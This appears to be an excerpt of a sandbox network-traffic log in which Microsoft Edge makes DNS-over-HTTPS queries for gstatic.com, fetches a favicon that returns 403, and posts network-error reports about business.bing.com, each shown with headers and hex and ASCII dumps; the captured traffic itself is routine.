                                                                                                                                                                                                                                                            Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Server: Kestrel
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:15 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                            X-CDN-TraceId: 0.07f21602.1741380015.28ca846c
                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.649702162.159.61.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:15 GMT
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                            CF-RAY: 91cce826be5f27d3-SAN
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fa 48 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcomH)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.649707162.159.61.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:15 GMT
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                            CF-RAY: 91cce8284dc027d2-SAN
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cf 00 04 8e fb 28 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom(#)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.649708172.64.41.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:15 GMT
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                            CF-RAY: 91cce8286b1d27d1-SAN
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fa 48 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)H)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.649709162.159.61.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:15 GMT
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                            CF-RAY: 91cce829ecb127d1-SAN
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fa 48 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)H)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.649713185.172.148.1324437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC640OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                            Host: s28.q4cdn.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                            Referer: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:40:17 UTC190INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: keycdn
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:16 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 1439
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "5ca0a75f-59f"
                                                                                                                                                                                                                                                            X-Edge-Location: defr
                                                                                                                                                                                                                                                            2025-03-07 20:40:17 UTC1439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>403 Forbidden</title> <style type


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.2.649716162.159.61.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.2.649718172.64.41.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.2.649717162.159.61.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.2.64972823.40.179.564437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:19 UTC382OUTPOST /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                                                                                                            Host: bzib.nelreports.net
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                            Content-Type: application/reports+json
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:40:19 UTC471OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 39 35 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e 67 2e 63 6f
                                                                                                                                                                                                                                                            Data Ascii: [{"age":2,"body":{"elapsed_time":2954,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bing.co
                                                                                                                                                                                                                                                            2025-03-07 20:40:19 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Server: Kestrel
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:19 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                            X-CDN-TraceId: 0.25b22817.1741380019.4bc39df
                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.2.65026123.40.179.564437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:41:14 UTC442OUTOPTIONS /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                                                                                                            Host: bzib.nelreports.net
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Origin: https://business.bing.com
                                                                                                                                                                                                                                                            Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:41:15 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Server: Kestrel
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:41:14 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                            X-CDN-TraceId: 0.25b22817.1741380074.4bdce10
                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            15192.168.2.65026623.40.179.564437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:41:17 UTC382OUTPOST /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                                                                                                            Host: bzib.nelreports.net
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 466
                                                                                                                                                                                                                                                            Content-Type: application/reports+json
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:41:17 UTC466OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 37 36 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 30 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e
